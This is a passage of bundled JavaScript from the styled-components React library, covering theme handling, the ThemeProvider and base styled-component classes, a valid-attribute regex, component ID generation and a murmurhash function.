        console.warn('Over ' + LIMIT + ' classes were generated for component ' + displayName + '. \n' + 'Consider using the attrs method, together with a style object for frequently changed styles.\n' + 'Example:\n' + '  const Component = styled.div.attrs({\n' + '    style: ({ background }) => ({\n' + '      background,\n' + '    }),\n' + '  })`width: 100%;`\n\n' + '  <Component />');
        warningSeen = true;
        generatedClasses = {};
      }
    }
  };
});

// 

var determineTheme = (function (props, fallbackTheme, defaultProps) {
  // Props should take precedence over ThemeProvider, which should take precedence over
  // defaultProps, but React automatically puts defaultProps on props.

  /* eslint-disable react/prop-types */
  var isDefaultTheme = defaultProps && props.theme === defaultProps.theme;
  var theme = props.theme && !isDefaultTheme ? props.theme : fallbackTheme;
  /* eslint-enable */

  return theme;
});

// 
var escapeRegex = /[[\].#*$><+~=|^:(),"'`-]+/g;
var dashesAtEnds = /(^-|-$)/g;

/**
 * TODO: Explore using CSS.escape when it becomes more available
 * in evergreen browsers.
 */
function escape(str) {
  return str
  // Replace all possible CSS selectors
  .replace(escapeRegex, '-')

  // Remove extraneous hyphens at the start and end
  .replace(dashesAtEnds, '');
}

// 

function getComponentName(target) {
  return target.displayName || target.name || 'Component';
}

// 

function isTag(target) /* : %checks */{
  return typeof target === 'string';
}

// 

function generateDisplayName(target) {
  return isTag(target) ? 'styled.' + target : 'Styled(' + getComponentName(target) + ')';
}

// 
/* eslint-disable max-len */
/**
 * Trying to avoid the unknown-prop errors on styled components by filtering by
 * React's attribute whitelist.
 *
 * To regenerate this regex:
 *
 * 1. `npm i -g regexgen` (https://github.com/devongovett/regexgen)
 * 2. Run `regexgen` with the list of space-separated words below as input
 * 3. Surround the emitted regex with this: `/^(GENERATED_REGEX)$/` -- this will ensure a full string match
 *    and no false positives from partials
 * */
/*
children dangerouslySetInnerHTML key ref autoFocus defaultValue valueLink defaultChecked checkedLink innerHTML suppressContentEditableWarning onFocusIn onFocusOut className onCopy onCut onPaste onCompositionEnd onCompositionStart onCompositionUpdate onKeyDown onKeyPress onKeyUp onFocus onBlur onChange onInput onInvalid onSubmit onReset onClick onContextMenu onDoubleClick onDrag onDragEnd onDragEnter onDragExit onDragLeave onDragOver onDragStart onDrop onMouseDown onMouseEnter onMouseLeave onMouseMove onMouseOut onMouseOver onMouseUp onSelect onTouchCancel onTouchEnd onTouchMove onTouchStart onScroll onWheel onAbort onCanPlay onCanPlayThrough onDurationChange onEmptied onEncrypted onEnded onError onLoadedData onLoadedMetadata onLoadStart onPause onPlay onPlaying onProgress onRateChange onSeeked onSeeking onStalled onSuspend onTimeUpdate onVolumeChange onWaiting onLoad onAnimationStart onAnimationEnd onAnimationIteration onTransitionEnd onCopyCapture onCutCapture onPasteCapture onCompositionEndCapture onCompositionStartCapture onCompositionUpdateCapture onKeyDownCapture onKeyPressCapture onKeyUpCapture onFocusCapture onBlurCapture onChangeCapture onInputCapture onSubmitCapture onResetCapture onClickCapture onContextMenuCapture onDoubleClickCapture onDragCapture onDragEndCapture onDragEnterCapture onDragExitCapture onDragLeaveCapture onDragOverCapture onDragStartCapture onDropCapture onMouseDownCapture onMouseEnterCapture onMouseLeaveCapture onMouseMoveCapture onMouseOutCapture onMouseOverCapture onMouseUpCapture onSelectCapture onTouchCancelCapture onTouchEndCapture onTouchMoveCapture onTouchStartCapture onScrollCapture onWheelCapture onAbortCapture onCanPlayCapture onCanPlayThroughCapture onDurationChangeCapture onEmptiedCapture onEncryptedCapture onEndedCapture onErrorCapture onLoadedDataCapture onLoadedMetadataCapture onLoadStartCapture onPauseCapture onPlayCapture onPlayingCapture onProgressCapture onRateChangeCapture onSeekedCapture onSeekingCapture onStalledCapture onSuspendCapture onTimeUpdateCapture onVolumeChangeCapture onWaitingCapture onLoadCapture onAnimationStartCapture onAnimationEndCapture onAnimationIterationCapture onTransitionEndCapture accept acceptCharset accessKey action allowFullScreen allowTransparency alt as async autoComplete autoPlay capture cellPadding cellSpacing charSet challenge checked cite classID className cols colSpan content contentEditable contextMenu controlsList controls coords crossOrigin data dateTime default defer dir disabled download draggable encType form formAction formEncType formMethod formNoValidate formTarget frameBorder headers height hidden high href hrefLang htmlFor httpEquiv icon id inputMode integrity is keyParams keyType kind label lang list loop low manifest marginHeight marginWidth max maxLength media mediaGroup method min minLength multiple muted name nonce noValidate open optimum pattern placeholder playsInline poster preload profile radioGroup readOnly referrerPolicy rel required reversed role rows rowSpan sandbox scope scoped scrolling seamless selected shape size sizes span spellCheck src srcDoc srcLang srcSet start step style summary tabIndex target title type useMap value width wmode wrap about datatype inlist prefix property resource typeof vocab autoCapitalize autoCorrect autoSave color itemProp itemScope itemType itemID itemRef results security unselectable accentHeight accumulate additive alignmentBaseline allowReorder alphabetic amplitude arabicForm ascent attributeName attributeType autoReverse azimuth baseFrequency baseProfile baselineShift bbox begin bias by calcMode capHeight clip clipPath clipRule clipPathUnits colorInterpolation colorInterpolationFilters colorProfile colorRendering contentScriptType contentStyleType cursor cx cy d decelerate descent diffuseConstant direction display divisor dominantBaseline dur dx dy edgeMode elevation enableBackground end exponent externalResourcesRequired fill fillOpacity fillRule filter filterRes filterUnits floodColor floodOpacity focusable fontFamily fontSize fontSizeAdjust fontStretch fontStyle fontVariant fontWeight format from fx fy g1 g2 glyphName glyphOrientationHorizontal glyphOrientationVertical glyphRef gradientTransform gradientUnits hanging horizAdvX horizOriginX ideographic imageRendering in in2 intercept k k1 k2 k3 k4 kernelMatrix kernelUnitLength kerning keyPoints keySplines keyTimes lengthAdjust letterSpacing lightingColor limitingConeAngle local markerEnd markerMid markerStart markerHeight markerUnits markerWidth mask maskContentUnits maskUnits mathematical mode numOctaves offset opacity operator order orient orientation origin overflow overlinePosition overlineThickness paintOrder panose1 pathLength patternContentUnits patternTransform patternUnits pointerEvents points pointsAtX pointsAtY pointsAtZ preserveAlpha preserveAspectRatio primitiveUnits r radius refX refY renderingIntent repeatCount repeatDur requiredExtensions requiredFeatures restart result rotate rx ry scale seed shapeRendering slope spacing specularConstant specularExponent speed spreadMethod startOffset stdDeviation stemh stemv stitchTiles stopColor stopOpacity strikethroughPosition strikethroughThickness string stroke strokeDasharray strokeDashoffset strokeLinecap strokeLinejoin strokeMiterlimit strokeOpacity strokeWidth surfaceScale systemLanguage tableValues targetX targetY textAnchor textDecoration textRendering textLength to transform u1 u2 underlinePosition underlineThickness unicode unicodeBidi unicodeRange unitsPerEm vAlphabetic vHanging vIdeographic vMathematical values vectorEffect version vertAdvY vertOriginX vertOriginY viewBox viewTarget visibility widths wordSpacing writingMode x xHeight x1 x2 xChannelSelector xlinkActuate xlinkArcrole xlinkHref xlinkRole xlinkShow xlinkTitle xlinkType xmlBase xmlns xmlnsXlink xmlLang xmlSpace y y1 y2 yChannelSelector z zoomAndPan onPointerDown onPointerMove onPointerUp onPointerCancel onGotPointerCapture onLostPointerCapture onPointerEnter onPointerLeave onPointerOver onPointerOut class for autofocus allow allowUserMedia allowPaymentRequest
*/
/* eslint-enable max-len */

var ATTRIBUTE_REGEX = /^((?:s(?:uppressContentEditableWarn|croll|pac)|(?:shape|image|text)Render|(?:letter|word)Spac|vHang|hang)ing|(?:on(?:AnimationIteration|C(?:o(?:mposition(?:Update|Start|End)|ntextMenu|py)|anPlayThrough|anPlay|hange|lick|ut)|(?:Animation|Touch|Load|Drag)Start|(?:(?:Duration|Volume|Rate)Chang|(?:MouseLea|(?:Touch|Mouse)Mo|DragLea)v|Paus)e|Loaded(?:Metad|D)ata|(?:(?:T(?:ransition|ouch)|Animation)E|Suspe)nd|DoubleClick|(?:TouchCanc|Whe)el|Lo(?:stPointer|ad)|TimeUpdate|(?:Mouse(?:Ent|Ov)e|Drag(?:Ent|Ov)e|Erro)r|GotPointer|MouseDown|(?:E(?:n(?:crypt|d)|mpti)|S(?:tall|eek))ed|KeyPress|(?:MouseOu|DragExi|S(?:elec|ubmi)|Rese|Inpu)t|P(?:rogress|laying)|DragEnd|Key(?:Down|Up)|(?:MouseU|Dro)p|(?:Wait|Seek)ing|Scroll|Focus|Paste|Abort|Drag|Play|Blur)Captur|alignmentBaselin|(?:limitingConeAng|xlink(?:(?:Arcr|R)o|Tit)|s(?:urfaceSca|ty|ca)|unselectab|baseProfi|fontSty|(?:focus|dragg)ab|multip|profi|tit)l|d(?:ominantBaselin|efaultValu)|onPointerLeav|a(?:uto(?:Capitaliz|Revers|Sav)|dditiv)|(?:(?:formNoValid|xlinkActu|noValid|accumul|rot)a|autoComple|decelera)t|(?:(?:attribute|item)T|datat)yp|onPointerMov|(?:attribute|glyph)Nam|playsInlin|(?:writing|input|edge)Mod|(?:formE|e)ncTyp|(?:amplitu|mo)d|(?:xlinkTy|itemSco|keyTy|slo)p|(?:xmlSpa|non)c|fillRul|(?:dateTi|na)m|r(?:esourc|ol)|xmlBas|wmod)e|(?:glyphOrientationHorizont|loc)al|(?:externalResourcesRequir|select|revers|mut)ed|c(?:o(?:lorInterpolationFilter|ord)s|o(?:lor(?:Interpolation)?|nt(?:rols|ent))|(?:ontentS(?:cript|tyle)Typ|o(?:ntentEditab|lorProfi)l|l(?:assNam|ipRul)|a(?:lcMod|ptur)|it)e|olorRendering|l(?:ipPathUnits|assID)|(?:ontrolsLis|apHeigh)t|h(?:eckedLink|a(?:llenge|rSet)|ildren|ecked)|ell(?:Spac|Padd)ing|o(?:ntextMenu|ls)|(?:rossOrigi|olSpa)n|l(?:ip(?:Path)?|ass)|ursor|[xy])|glyphOrientationVertical|d(?:angerouslySetInnerHTML|efaultChecked|ownload|isabled|isplay|[xy])|(?:s(?:trikethroughThickn|eaml)es|(?:und|ov)erlineThicknes|r(?:equiredExtension|adiu)|(?:requiredFeatur|tableValu|stitchTil|numOctav|filterR)e|key(?:(?:Splin|Tim)e|Param)|auto[Ff]ocu|header|bia)s|(?:(?:st(?:rikethroughPosi|dDevia)|(?:und|ov)erlinePosi|(?:textDecor|elev)a|orienta)tio|(?:strokeLinejo|orig)i|on(?:PointerDow|FocusI)|formActio|zoomAndPa|directio|(?:vers|act)io|rowSpa|begi|ico)n|o(?:n(?:AnimationIteration|C(?:o(?:mposition(?:Update|Start|End)|ntextMenu|py)|anPlayThrough|anPlay|hange|lick|ut)|(?:(?:Duration|Volume|Rate)Chang|(?:MouseLea|(?:Touch|Mouse)Mo|DragLea)v|Paus)e|Loaded(?:Metad|D)ata|(?:Animation|Touch|Load|Drag)Start|(?:(?:T(?:ransition|ouch)|Animation)E|Suspe)nd|DoubleClick|(?:TouchCanc|Whe)el|(?:Mouse(?:Ent|Ov)e|Drag(?:Ent|Ov)e|Erro)r|TimeUpdate|(?:E(?:n(?:crypt|d)|mpti)|S(?:tall|eek))ed|MouseDown|P(?:rogress|laying)|(?:MouseOu|DragExi|S(?:elec|ubmi)|Rese|Inpu)t|KeyPress|DragEnd|Key(?:Down|Up)|(?:Wait|Seek)ing|(?:MouseU|Dro)p|Scroll|Paste|Focus|Abort|Drag|Play|Load|Blur)|rient)|p(?:reserveAspectRatio|ointsAt[X-Z]|anose1)|(?:(?:allowPaymentReque|(?:fontSize|length)Adju|manife)s|strokeMiterlimi|(?:(?:specularE|e)xpon|renderingInt|asc)en|(?:specularConsta|repeatCou|fontVaria)n|d(?:iffuseConsta|esce)n|baselineShif|vectorEffec|onPointerOu|(?:(?:mar(?:ker|gin)|x)H|accentH|fontW)eigh|markerStar|a(?:utoCorrec|bou)|onFocusOu|intercep|restar|forma|inlis|heigh|lis)t|(?:patternContent|ma(?:sk(?:Content)?|rker)|primitive|gradient|pattern|filter)Units|(?:(?:allowTranspar|baseFrequ)enc|re(?:ferrerPolic|adOnl)|(?:(?:st(?:roke|op)O|floodO|fillO|o)pac|integr|secur)it|visibilit|fontFamil|accessKe|propert|summar)y|(?:gradientT|patternT|t)ransform|(?:(?:st(?:rokeDasho|artO)|o)ffs|acceptChars|formTarg|viewTarg|srcS)et|(?:[xy]ChannelSelect|lightingCol|textAnch|floodCol|stopCol|operat|htmlF)or|(?:(?:enableBackgrou|markerE)n|s(?:p(?:readMetho|ee)|ee)|formMetho|(?:markerM|onInval)i|preloa|metho|kin)d|k(?:ernel(?:UnitLength|Matrix)|[1-4])|strokeDasharray|(?:onPointerCanc|lab)el|(?:allowFullScre|hidd)en|a(?:l(?:lowUserMedia|phabetic|t)|rabicForm|sync)|systemLanguage|(?:(?:o(?:nPointer(?:Ent|Ov)|rd)|allowReord|placehold|frameBord|paintOrd|post)e|repeatDu|d(?:efe|u))r|(?:pointerEve|keyPoi)nts|preserveAlpha|(?:strokeLineca|onPointerU|itemPro|useMa|wra|loo)p|v(?:Mathematical|ert(?:Origin[XY]|AdvY)|alues|ocab)|unicodeRange|h(?:oriz(?:Origin|Adv)X|ttpEquiv)|(?:vI|i)deographic|mathematical|u(?:nicodeBidi|[12])|(?:fontStretc|hig)h|vAlphabetic|(?:(?:mar(?:ker|gin)W|strokeW)id|azimu)th|(?:xmlnsXl|valueL)ink|mediaGroup|spellCheck|(?:text|m(?:in|ax))Length|(?:unitsPerE|optimu|fro)m|r(?:adioGroup|e(?:sults|f[XY]|l)|ows|[xy])|pathLength|(?:xlinkHr|glyphR)ef|innerHTML|xlinkShow|f(?:o(?:ntSize|rm?)|il(?:ter|l))|(?:tabInde|(?:sand|b)bo|viewBo)x|autoPlay|r(?:e(?:quired|sult|f))?|(?:(?:href|xml|src)La|kerni)ng|o(?:verflow|pen)|i(?:temRef|n2|s)|p(?:attern|oints)|unicode|d(?:efault|ata|ir)?|divisor|t(?:arget[XY]|o)|(?:stri|la)ng|(?:width|size)s|prefix|typeof|srcDoc|s(?:coped|te(?:m[hv]|p)|pan)|s(?:t(?:roke|art)|hape|cope|rc)|a(?:ccept|llow|s)|itemID|t(?:arget|ype)|m(?:edia|a(?:sk|x)|in)|value|width|x(?:mlns)?|size|href|k(?:ey)?|end|low|by|x[12]|y[12]|g[12]|i[dn]|f[xy]|[yz])$/;
/* From DOMProperty */
var ATTRIBUTE_NAME_START_CHAR = ':A-Z_a-z\\u00C0-\\u00D6\\u00D8-\\u00F6\\u00F8-\\u02FF\\u0370-\\u037D\\u037F-\\u1FFF\\u200C-\\u200D\\u2070-\\u218F\\u2C00-\\u2FEF\\u3001-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFFD';
var ATTRIBUTE_NAME_CHAR = ATTRIBUTE_NAME_START_CHAR + '\\-.0-9\\u00B7\\u0300-\\u036F\\u203F-\\u2040';
var isCustomAttribute = RegExp.prototype.test.bind(new RegExp('^(x|data|aria)-[' + ATTRIBUTE_NAME_CHAR + ']*$'));

var validAttr = (function (name) {
  return ATTRIBUTE_REGEX.test(name) || isCustomAttribute(name.toLowerCase());
});

// 

function hasInInheritanceChain(child, parent) {
  var target = child;

  while (target) {
    target = Object.getPrototypeOf(target);

    if (target && target === parent) {
      return true;
    }
  }

  return false;
}

// 
/**
 * Creates a broadcast that can be listened to, i.e. simple event emitter
 *
 * @see https://github.com/ReactTraining/react-broadcast
 */

var createBroadcast = function createBroadcast(initialState) {
  var listeners = {};
  var id = 0;
  var state = initialState;

  function publish(nextState) {
    state = nextState;

    // eslint-disable-next-line guard-for-in, no-restricted-syntax
    for (var key in listeners) {
      var listener = listeners[key];
      if (listener === undefined) {
        // eslint-disable-next-line no-continue
        continue;
      }

      listener(state);
    }
  }

  function subscribe(listener) {
    var currentId = id;
    listeners[currentId] = listener;
    id += 1;
    listener(state);
    return currentId;
  }

  function unsubscribe(unsubID) {
    listeners[unsubID] = undefined;
  }

  return { publish: publish, subscribe: subscribe, unsubscribe: unsubscribe };
};

var _contextShape, _ThemeProvider$contex;

// NOTE: DO NOT CHANGE, changing this is a semver major change!
var CHANNEL = '__styled-components__';
var CHANNEL_NEXT = CHANNEL + 'next__';

var CONTEXT_CHANNEL_SHAPE = __WEBPACK_IMPORTED_MODULE_4_prop_types___default.a.shape({
  getTheme: __WEBPACK_IMPORTED_MODULE_4_prop_types___default.a.func,
  subscribe: __WEBPACK_IMPORTED_MODULE_4_prop_types___default.a.func,
  unsubscribe: __WEBPACK_IMPORTED_MODULE_4_prop_types___default.a.func
});

var contextShape = (_contextShape = {}, _contextShape[CHANNEL] = __WEBPACK_IMPORTED_MODULE_4_prop_types___default.a.func, _contextShape[CHANNEL_NEXT] = CONTEXT_CHANNEL_SHAPE, _contextShape);

var warnChannelDeprecated = void 0;
if (false) {
  warnChannelDeprecated = once(function () {
    // eslint-disable-next-line no-console
    console.warn('Warning: Usage of `context.' + CHANNEL + '` as a function is deprecated. It will be replaced with the object on `.context.' + CHANNEL_NEXT + '` in a future version.');
  });
}

var isFunction = function isFunction(test) {
  return typeof test === 'function';
};

/**
 * Provide a theme to an entire react component tree via context and event listeners (have to do
 * both context and event emitter as pure components block context updates)
 */

var ThemeProvider = function (_Component) {
  inherits(ThemeProvider, _Component);

  function ThemeProvider() {
    classCallCheck(this, ThemeProvider);

    var _this = possibleConstructorReturn(this, _Component.call(this));

    _this.unsubscribeToOuterId = -1;

    _this.getTheme = _this.getTheme.bind(_this);
    return _this;
  }

  ThemeProvider.prototype.componentWillMount = function componentWillMount() {
    var _this2 = this;

    // If there is a ThemeProvider wrapper anywhere around this theme provider, merge this theme
    // with the outer theme
    var outerContext = this.context[CHANNEL_NEXT];
    if (outerContext !== undefined) {
      this.unsubscribeToOuterId = outerContext.subscribe(function (theme) {
        _this2.outerTheme = theme;

        if (_this2.broadcast !== undefined) {
          _this2.publish(_this2.props.theme);
        }
      });
    }

    this.broadcast = createBroadcast(this.getTheme());
  };

  ThemeProvider.prototype.getChildContext = function getChildContext() {
    var _this3 = this,
        _babelHelpers$extends;

    return _extends({}, this.context, (_babelHelpers$extends = {}, _babelHelpers$extends[CHANNEL_NEXT] = {
      getTheme: this.getTheme,
      subscribe: this.broadcast.subscribe,
      unsubscribe: this.broadcast.unsubscribe
    }, _babelHelpers$extends[CHANNEL] = function (subscriber) {
      if (false) {
        warnChannelDeprecated();
      }

      // Patch the old `subscribe` provide via `CHANNEL` for older clients.
      var unsubscribeId = _this3.broadcast.subscribe(subscriber);
      return function () {
        return _this3.broadcast.unsubscribe(unsubscribeId);
      };
    }, _babelHelpers$extends));
  };

  ThemeProvider.prototype.componentWillReceiveProps = function componentWillReceiveProps(nextProps) {
    if (this.props.theme !== nextProps.theme) {
      this.publish(nextProps.theme);
    }
  };

  ThemeProvider.prototype.componentWillUnmount = function componentWillUnmount() {
    if (this.unsubscribeToOuterId !== -1) {
      this.context[CHANNEL_NEXT].unsubscribe(this.unsubscribeToOuterId);
    }
  };

  // Get the theme from the props, supporting both (outerTheme) => {} as well as object notation


  ThemeProvider.prototype.getTheme = function getTheme(passedTheme) {
    var theme = passedTheme || this.props.theme;

    if (isFunction(theme)) {
      var mergedTheme = theme(this.outerTheme);

      if (false) {
        throw new StyledComponentsError(7);
      }

      return mergedTheme;
    }

    if (theme === null || Array.isArray(theme) || (typeof theme === 'undefined' ? 'undefined' : _typeof(theme)) !== 'object') {
      throw new StyledComponentsError(8);
    }

    return _extends({}, this.outerTheme, theme);
  };

  ThemeProvider.prototype.publish = function publish(theme) {
    this.broadcast.publish(this.getTheme(theme));
  };

  ThemeProvider.prototype.render = function render() {
    if (!this.props.children) {
      return null;
    }

    return __WEBPACK_IMPORTED_MODULE_1_react___default.a.Children.only(this.props.children);
  };

  return ThemeProvider;
}(__WEBPACK_IMPORTED_MODULE_1_react__["Component"]);

ThemeProvider.childContextTypes = contextShape;
ThemeProvider.contextTypes = (_ThemeProvider$contex = {}, _ThemeProvider$contex[CHANNEL_NEXT] = CONTEXT_CHANNEL_SHAPE, _ThemeProvider$contex);

var _babelHelpers$extends;

// HACK for generating all static styles without needing to allocate
// an empty execution context every single time...
var STATIC_EXECUTION_CONTEXT = {};

var modifiedContextShape = _extends({}, contextShape, (_babelHelpers$extends = {}, _babelHelpers$extends[CONTEXT_KEY] = __WEBPACK_IMPORTED_MODULE_4_prop_types___default.a.oneOfType([__WEBPACK_IMPORTED_MODULE_4_prop_types___default.a.instanceOf(StyleSheet), __WEBPACK_IMPORTED_MODULE_4_prop_types___default.a.instanceOf(ServerStyleSheet)]), _babelHelpers$extends));

var identifiers = {};

/* We depend on components having unique IDs */
var generateId = function generateId(ComponentStyle, _displayName, parentComponentId) {
  var displayName = typeof _displayName !== 'string' ? 'sc' : escape(_displayName);

  /**
   * This ensures uniqueness if two components happen to share
   * the same displayName.
   */
  var nr = (identifiers[displayName] || 0) + 1;
  identifiers[displayName] = nr;

  var componentId = displayName + '-' + ComponentStyle.generateName(displayName + nr);

  return parentComponentId !== undefined ? parentComponentId + '-' + componentId : componentId;
};

var warnExtendDeprecated = function warnExtendDeprecated() {};
if (false) {
  warnExtendDeprecated = once(function () {
    // eslint-disable-next-line no-console
    console.warn('Warning: The "extend" API will be removed in the upcoming v4.0 release. Use styled(StyledComponent) instead. You can find more information here: https://github.com/styled-components/styled-components/issues/1546');
  });
}

// $FlowFixMe

var BaseStyledComponent = function (_Component) {
  inherits(BaseStyledComponent, _Component);

  function BaseStyledComponent() {
    var _temp, _this, _ret;

    classCallCheck(this, BaseStyledComponent);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = possibleConstructorReturn(this, _Component.call.apply(_Component, [this].concat(args))), _this), _this.attrs = {}, _this.state = {
      theme: null,
      generatedClassName: ''
    }, _this.unsubscribeId = -1, _temp), possibleConstructorReturn(_this, _ret);
  }

  BaseStyledComponent.prototype.unsubscribeFromContext = function unsubscribeFromContext() {
    if (this.unsubscribeId !== -1) {
      this.context[CHANNEL_NEXT].unsubscribe(this.unsubscribeId);
    }
  };

  BaseStyledComponent.prototype.buildExecutionContext = function buildExecutionContext(theme, props) {
    var attrs = this.constructor.attrs;

    var context = _extends({}, props, { theme: theme });
    if (attrs === undefined) {
      return context;
    }

    this.attrs = Object.keys(attrs).reduce(function (acc, key) {
      var attr = attrs[key];

      // eslint-disable-next-line no-param-reassign
      acc[key] = typeof attr === 'function' && !hasInInheritanceChain(attr, __WEBPACK_IMPORTED_MODULE_1_react__["Component"]) ? attr(context) : attr;
      return acc;
    }, {});

    return _extends({}, context, this.attrs);
  };

  BaseStyledComponent.prototype.generateAndInjectStyles = function generateAndInjectStyles(theme, props) {
    var _constructor = this.constructor,
        attrs = _constructor.attrs,
        componentStyle = _constructor.componentStyle,
        warnTooManyClasses = _constructor.warnTooManyClasses;

    var styleSheet = this.context[CONTEXT_KEY] || StyleSheet.master;

    // statically styled-components don't need to build an execution context object,
    // and shouldn't be increasing the number of class names
    if (componentStyle.isStatic && attrs === undefined) {
      return componentStyle.generateAndInjectStyles(STATIC_EXECUTION_CONTEXT, styleSheet);
    } else {
      var executionContext = this.buildExecutionContext(theme, props);
      var className = componentStyle.generateAndInjectStyles(executionContext, styleSheet);

      if (false) {
        warnTooManyClasses(className);
      }

      return className;
    }
  };

  BaseStyledComponent.prototype.componentWillMount = function componentWillMount() {
    var _this2 = this;

    var componentStyle = this.constructor.componentStyle;

    var styledContext = this.context[CHANNEL_NEXT];

    // If this is a statically-styled component, we don't need to the theme
    // to generate or build styles.
    if (componentStyle.isStatic) {
      var generatedClassName = this.generateAndInjectStyles(STATIC_EXECUTION_CONTEXT, this.props);
      this.setState({ generatedClassName: generatedClassName });
      // If there is a theme in the context, subscribe to the event emitter. This
      // is necessary due to pure components blocking context updates, this circumvents
      // that by updating when an event is emitted
    } else if (styledContext !== undefined) {
      var subscribe = styledContext.subscribe;

      this.unsubscribeId = subscribe(function (nextTheme) {
        // This will be called once immediately
        var theme = determineTheme(_this2.props, nextTheme, _this2.constructor.defaultProps);

        var generatedClassName = _this2.generateAndInjectStyles(theme, _this2.props);

        _this2.setState({ theme: theme, generatedClassName: generatedClassName });
      });
    } else {
      // eslint-disable-next-line react/prop-types
      var theme = this.props.theme || EMPTY_OBJECT;
      var _generatedClassName = this.generateAndInjectStyles(theme, this.props);
      this.setState({ theme: theme, generatedClassName: _generatedClassName });
    }
  };

  BaseStyledComponent.prototype.componentWillReceiveProps = function componentWillReceiveProps(nextProps) {
    var _this3 = this;

    // If this is a statically-styled component, we don't need to listen to
    // props changes to update styles
    var componentStyle = this.constructor.componentStyle;

    if (componentStyle.isStatic) {
      return;
    }

    this.setState(function (prevState) {
      var theme = determineTheme(nextProps, prevState.theme, _this3.constructor.defaultProps);
      var generatedClassName = _this3.generateAndInjectStyles(theme, nextProps);

      return { theme: theme, generatedClassName: generatedClassName };
    });
  };

  BaseStyledComponent.prototype.componentWillUnmount = function componentWillUnmount() {
    this.unsubscribeFromContext();
  };

  BaseStyledComponent.prototype.render = function render() {
    // eslint-disable-next-line react/prop-types
    var innerRef = this.props.innerRef;
    var generatedClassName = this.state.generatedClassName;
    var _constructor2 = this.constructor,
        styledComponentId = _constructor2.styledComponentId,
        target = _constructor2.target;


    var isTargetTag = isTag(target);

    var className = [
    // eslint-disable-next-line react/prop-types
    this.props.className, styledComponentId, this.attrs.className, generatedClassName].filter(Boolean).join(' ');

    var baseProps = _extends({}, this.attrs, {
      className: className
    });

    if (isStyledComponent(target)) {
      baseProps.innerRef = innerRef;
    } else {
      baseProps.ref = innerRef;
    }

    var propsForElement = baseProps;
    var key = void 0;

    for (key in this.props) {
      // Don't pass through non HTML tags through to HTML elements
      // always omit innerRef
      if (key !== 'innerRef' && key !== 'className' && (!isTargetTag || validAttr(key))) {
        propsForElement[key] = key === 'style' && key in this.attrs ? _extends({}, this.attrs[key], this.props[key]) : this.props[key];
      }
    }

    return Object(__WEBPACK_IMPORTED_MODULE_1_react__["createElement"])(target, propsForElement);
  };

  return BaseStyledComponent;
}(__WEBPACK_IMPORTED_MODULE_1_react__["Component"]);

var _StyledComponent = (function (ComponentStyle, constructWithOptions) {
  var createStyledComponent = function createStyledComponent(target, options, rules) {
    var _options$isClass = options.isClass,
        isClass = _options$isClass === undefined ? !isTag(target) : _options$isClass,
        _options$displayName = options.displayName,
        displayName = _options$displayName === undefined ? generateDisplayName(target) : _options$displayName,
        _options$componentId = options.componentId,
        componentId = _options$componentId === undefined ? generateId(ComponentStyle, options.displayName, options.parentComponentId) : _options$componentId,
        _options$ParentCompon = options.ParentComponent,
        ParentComponent = _options$ParentCompon === undefined ? BaseStyledComponent : _options$ParentCompon,
        extendingRules = options.rules,
        attrs = options.attrs;


    var styledComponentId = options.displayName && options.componentId ? escape(options.displayName) + '-' + options.componentId : options.componentId || componentId;

    var componentStyle = new ComponentStyle(extendingRules === undefined ? rules : extendingRules.concat(rules), attrs, styledComponentId);

    var StyledComponent = function (_ParentComponent) {
      inherits(StyledComponent, _ParentComponent);

      function StyledComponent() {
        classCallCheck(this, StyledComponent);
        return possibleConstructorReturn(this, _ParentComponent.apply(this, arguments));
      }

      StyledComponent.withComponent = function withComponent(tag) {
        var previousComponentId = options.componentId,
            optionsToCopy = objectWithoutProperties(options, ['componentId']);


        var newComponentId = previousComponentId && previousComponentId + '-' + (isTag(tag) ? tag : escape(getComponentName(tag)));

        var newOptions = _extends({}, optionsToCopy, {
          componentId: newComponentId,
          ParentComponent: StyledComponent
        });

        return createStyledComponent(tag, newOptions, rules);
      };

      createClass(StyledComponent, null, [{
        key: 'extend',
        get: function get$$1() {
          var rulesFromOptions = options.rules,
              parentComponentId = options.componentId,
              optionsToCopy = objectWithoutProperties(options, ['rules', 'componentId']);


          var newRules = rulesFromOptions === undefined ? rules : rulesFromOptions.concat(rules);

          var newOptions = _extends({}, optionsToCopy, {
            rules: newRules,
            parentComponentId: parentComponentId,
            ParentComponent: StyledComponent
          });

          warnExtendDeprecated();

          return constructWithOptions(createStyledComponent, target, newOptions);
        }
      }]);
      return StyledComponent;
    }(ParentComponent);

    StyledComponent.attrs = attrs;
    StyledComponent.componentStyle = componentStyle;
    StyledComponent.contextTypes = modifiedContextShape;
    StyledComponent.displayName = displayName;
    StyledComponent.styledComponentId = styledComponentId;
    StyledComponent.target = target;


    if (false) {
      StyledComponent.warnTooManyClasses = createWarnTooManyClasses(displayName);
    }

    if (isClass) {
      __WEBPACK_IMPORTED_MODULE_5_hoist_non_react_statics___default()(StyledComponent, target, {
        // all SC-specific things should not be hoisted
        attrs: true,
        componentStyle: true,
        displayName: true,
        extend: true,
        styledComponentId: true,
        target: true,
        warnTooManyClasses: true,
        withComponent: true
      });
    }

    return StyledComponent;
  };

  return createStyledComponent;
});

// Source: https://github.com/garycourt/murmurhash-js/blob/master/murmurhash2_gc.js
function murmurhash(str) {
  var l = str.length | 0,
      h = l | 0,
      i = 0,
      k;

  while (l >= 4) {
    k = str.charCodeAt(i) & 0xff | (str.charCodeAt(++i) & 0xff) << 8 | (str.charCodeAt(++i) & 0xff) << 16 | (str.charCodeAt(++i) & 0xff) << 24;

    k = (k & 0xffff) * 0x5bd1e995 + (((k >>> 16) * 0x5bd1e995 & 0xffff) << 16);
    k ^= k >>> 24;
    k = (k & 0xffff) * 0x5bd1e995 + (((k >>> 16) * 0x5bd1e995 & 0xffff) << 16);

    h = (h & 0xffff) * 0x5bd1e995 + (((h >>> 16) * 0x5bd1e995 & 0xffff) << 16) ^ k;

    l -= 4;
    ++i;
  }

  switch (l) {
    case 3:
      h ^= (str.charCodeAt(i + 2) & 0xff) << 16;
    case 2:
      h ^= (str.charCodeAt(i + 1) & 0xff) << 8;
    case 1:
      h ^= str.charCodeAt(i) & 0xff;
      h = (h & 0xffff) * 0x5bd1e995 + (((h >>> 16) * 0x5bd1e995 & 0xffff) << 16);
  }

  h ^= h >>> 13;
  h = (h & 0xffff) * 0x5bd1e995 + (((h >>> 16) * 0x5bd1e995 & 0xffff) << 16);
  h ^= h >>> 15;

  return h >>> 0;
}

// 

var areStylesCacheable = IS_BROWSER;

